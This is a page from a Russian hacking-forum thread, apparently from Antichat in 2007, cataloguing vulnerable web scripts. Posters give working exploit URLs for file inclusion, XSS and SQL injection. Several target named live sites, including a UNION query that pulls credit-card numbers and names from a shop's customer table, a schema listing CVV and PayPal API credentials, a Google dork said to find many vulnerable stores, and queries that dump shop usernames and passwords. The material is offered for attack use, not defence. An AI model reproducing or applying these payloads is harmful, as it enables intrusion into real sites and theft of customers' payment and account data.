Форум АНТИЧАТ
Страница 4 из 41 < 1 2 3 4 5 6 7 8 14 > Последняя »
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Энциклопедия уязвимых скриптов (https://forum.antichat.xyz/showthread.php?t=19997)

NOmeR1 03.07.2007 23:59
немного PHP-inj.

PHP::HTML 0.6.4 (PHP-inj)
phphtml.php?htmlclass_path=[url]

Media Gallery 1.4.8a (PHP-inj)
mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=[file]

YAAP 1.5 (PHP-inj)
includes/common.php?root_path=[file]

NagiosQL 2.00-P00 (PHP-inj)
functions/prepend_adm.php?SETS[path][physical]=[file]

Grey 12.07.2007 13:16
AMGuests0.3.0

1) Локальный инклуд файлов.

Требуется:

register_globals = On
magic_quotes = Off

Код:
http://site.ru/gb/signin.php?sent=1&AMG_serverpath=FILE%00
2) Пассивные XSS.

Требуется:

register_globals = On

Код:
http://site.ru/gb/signin.php?AMG_signin_name="><script>alert(1);</script>
http://site.ru/gb/signin.php?AMG_signin_location="><script>alert(1);</script>
http://site.ru/gb/signin.php?AMG_signin_icq="><script>alert(1);</script>
http://site.ru/gb/signin.php?AMG_signin_email="><script>alert(1);</script>
http://site.ru/gb/signin.php?AMG_currentlanguage[signin_form_userimage]="><script>alert(1);</script>

Ni0x 12.07.2007 13:50
Virtual War v1.5.0 or low
XSS и SQL-INJ
Цитата:
http://[host]/vwar/war.php?s=[SQL]
http://[host]/vwar/war.php?page=[SQL]or[XSS]
http://[host]/vwar/war.php?showgame=[SQL]
http://[host]/vwar/war.php?sortby=[SQL]
http://[host]/vwar/war.php?sortorder=[SQL]
http://[host]/vwar/calendar.php?year=[XSS]
http://[host]/vwar/calendar.php?month=[SQL] & [XSS]
зы: Powered by: Virtual War v1.5.0

n0ne 19.07.2007 18:15
SQL-inj в QuickEstore
 
Существует возможность провести sql-инъекцию из-за недостаточной обработки входных данных в параметре CFTOKEN в скрипте insertorder.cfm.

Пример:

Цитата:
http://www.appointmentsatfive.com/insertorder.cfm?CFID=6060&CFTOKEN=88477579+union+s elect+1,2,3,ccnum,ccname,6,7,8,9,10,11,12,13,cctyp e,ccexpires,16,17,18,19+from+customers/*
Кол-во полей везде разное, но в основном от 15 до 19.

Есть и cvv, но он в таблице PARAMS и есть почему-то не везде, но можно вывести его и через последние заказы.

Вот всё остальное (после TABLE таблица, ниже колонки в ней):

Цитата:
TABLE [Attributes]
[AttributeNum]
[Attribute]
[AttValues]


TABLE [Categories]
[CategoryID]
[Category]
[CatPic]


TABLE [Customers]
[CustID]
[CustFName]
[CustLName]
[CustPhone]
[CustEMail]
[CustAddress1]
[CustAddress2]
[CustCity]
[CustState]
[CustZip]
[CustCountry]
[LastOrderID]
[LastOrderDate]
[LastOrderAmt]
[CCName]
[CCType]
[CCNum]
[CCExpires]
[CustPWord]


TABLE [OrderHist]
[OrderNum]
[CustID]
[ItemID]
[SKU]
[Quantity]
[ItemTotal]
[TotItemWeight]
[Att1]
[Att2]
[Status]


TABLE [Orders]
[OrderID]
[ItemID]
[Quantity]
[ItemTotal]
[TotItemWeight]
[Expires]
[Att1]
[Att2]


TABLE [OrdHistDetail]
[OrderNum]
[CustID]
[GrandTotal]
[Shipping]
[SalesTax]
[OrderDate]
[CustEMail]
[Notes]
[ShipDate]
[ShipMethod]
[ShipName]
[ShipAddress]
[ShipCity]
[ShipState]
[ShipZip]
[upsize_ts]
[AddressStatus]

TABLE [Params]
[storename]
[template]
[password]
[processor]
[partner]
[vendor]
[loginid]
[paypassword]
[certpath]
[type]
[ccards]
[testmode]
[inv_description]
[store_path]
[store_url]
[secure_url]
[order_path]
[order_url]
[orderaction]
[notifyemail]
[db]
[graphic]
[shipmethod]
[selfservice]
[offerpaypal]
[paypalonly]
[ppec]
[cffileenabled]
[csistorename]
[storefax]
[storeaddy]
[storecity]
[storestate]
[storezip]
[avs]
[cvv]
[PPEC_API_UserName]
[PPEC_API_Password]
[PPEC_API_Signature]


TABLE [ProdPics]
[ItemID]
[ItemPic]
[Thumbnail]


TABLE [Products]
[ItemID]
[SKU]
[ItemName]
[CategoryID]
[SubCatID]
[Description]
[Price]
[MSRP]
[DiscAmt]
[DiscIsPct]
[DiscTrigger]
[Weight]
[A1]
[A1Vals]
[A2]
[A2Vals]
[Units]
[Layout]
[Qty_In_Stock]
[Safety_Stock]
[Taxable]
[Shipable]
[Show_Inventory]
[New] [bit]


TABLE [SalesTax]
[State]
[Rate]


TABLE [ShipOptions]
[OptID]
[Option_]
[OptRate]


TABLE [Shipping]
[shiplimit]
[shipfee]


TABLE [SubCats]
[SubCatID]
[SubCat]
[TopCatID]


TABLE [States]
[State]
[Abbreviation]


TABLE [Categories]
[PK_Categories]
[CategoryID]


TABLE [Customers]
[PK_Customers]
[CustID]


TABLE [ProdPics]
[PK_ProdPics]
[ItemID]


TABLE [Products]
[DF_Products_Taxable]
[Taxable]
[DF_Products_Shipable]
[Shipable],
[PK_Products]
[ItemID]

На счет версии не знаю, но в гугле на запрос
Цитата:
inurl:"insertorder.cfm"
каждая вторая уязвима.



P.S.: Вроде ничё не забыл :)

n0ne 07.08.2007 21:34
Раскрытие пути в ARTEShok CMS:

Цитата:
http://www.paratech.ru/main.phtml?cid[]=5010072
^^^ их оф.сайт ^^^

Dr.Frank 28.08.2007 12:37
SQL-инъекция в CMS Koobi
 
CMS Koobi v4.2 v5.8 v6.1 со страницей скачки файлов
возможно другие версии(тестировал только на этих)

http://site/index.php?area=1&p=downloads&categ=-1+union+select+1,concat(email,0x3a,pass),3+from+table_name/*

Наиболее вероятные зачения table_name:
Код:
koobi4_user
kpro_user
kpro5_user
kpro6_user
для авторизации нужны email и пароль

Пароль - дважды хэшированный md5: md5(md5($pass))

Grey 15.09.2007 11:03
Open Guestbook 0.5

Скачать можно здесь:

http://sourceforge.net/project/showf...group_id=82463

1) Пассивная XSS

Код:
http://localhost/header.php?title=</title><script>alert(123);</script>
2) SQL инъекция/активная XSS

В скрипте process.php из-за отсутсвия фильтрации можно провести инъекцию в запросе INSERT...

При добавление сообщения в поле Message вводим:

Код:
','','','', '', '', '', '', '', '><script>alert(111);</script>', '', '', '')/*
В результате получим выполнение нашего скрипта при просмотре сообщений, т.е. получаем активную xss.

phol1eadeux 03.11.2007 04:02
artCifra CMS v4.5
Уязвимость в cookie. Имя куки artcifraSES. Возможность проведения SQL инъекции.
Пример:
Изменяем содержимое куки на:
Код:
')+union+select+column1,column2+from+some_table

Scipio 15.11.2007 04:39
CONTENTdm

Пассивные XSS:

1) в скрипте results.php уязвимы переменная CISOBOX1, CISOBOX2 и т.д.

кстати найдена мной 05.07.2007

а в багтраках появилась только 06.08.2007, так что если и баян, то свой, так сказать для полноты сюда запостил

2) во многих скриптах в переменной CISOROOT
примеры:
Код:
http://contentdm.nitle.org/cdm4/item_viewer.php?CISOROOT=%3Cscript%3Ealert(document.cookie);%3C/script%3E
Код:
http://mdc.cbuc.cat/cdm4/document.php?CISOROOT=%3Cscript%3Ealert(document.cookie);%3C/script%3E

Ky3bMu4 19.11.2007 19:03
A-Shop
Версии: 4.4.1(возможно и более ранние) - 4.7.х(last)

SQL-инъекция с доступом в user и с незашифренными пасами.

Уязвимость в catalogue.php , переменная cat, фильтрации никакой нет. Колличество столбцов 33,32 или 2.

Пример:
Код:
http://www.the123d.com/shop/catalogue.php?cat=-21+union+select+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+user/*

Админка:
http://www.the123d.com/shop/admin/login.php

Отправил на video@antichat.ru должны скоро выложить.


Время: 06:06
Страница 4 из 41 < 1 2 3 4 5 6 7 8 14 > Последняя »
Показывать 40 сообщений этой темы на одной странице